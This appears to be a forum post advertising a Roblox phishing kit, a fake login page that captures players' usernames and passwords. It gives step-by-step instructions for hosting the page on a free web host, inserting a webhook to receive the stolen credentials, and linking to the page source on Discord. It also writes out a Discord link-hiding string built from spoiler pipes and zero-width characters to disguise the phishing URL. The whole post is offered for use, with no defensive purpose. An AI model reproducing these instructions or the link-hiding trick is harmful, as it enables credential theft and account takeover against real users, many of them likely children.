Roblox Phi’s - 

Roblox Source

A fake roblox site that can take their username and password.

            ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

Steps on how to set it up.

1. Go to https://www.000webhost.com/ ,  and make a website.
2. Then go to file manager and click public.html
3. Once you are there download the txt file and rename the file index.html.
4. After that you import the new file you just made into public.html.
5. Edit the file in file manager and go to line 80, then put your webhook there.
6. Save and close, your site is now done.

            ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

To make it more realistic, you can add a domain. You can also go download the link hider and when you send it to someone on discord it will block the roblox link.

            ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

Links:

Roblox txt file: Below this thread.

Link Hider: Below this thread.

            ▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬▬

https://cdn.discordapp.com/attachments/806760079603924992/822967130097451080/Roblox_Source.txt

anything here||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||||​||https://(yourlinkhere)

In "anything here", don't put another link in it. You have to use text.


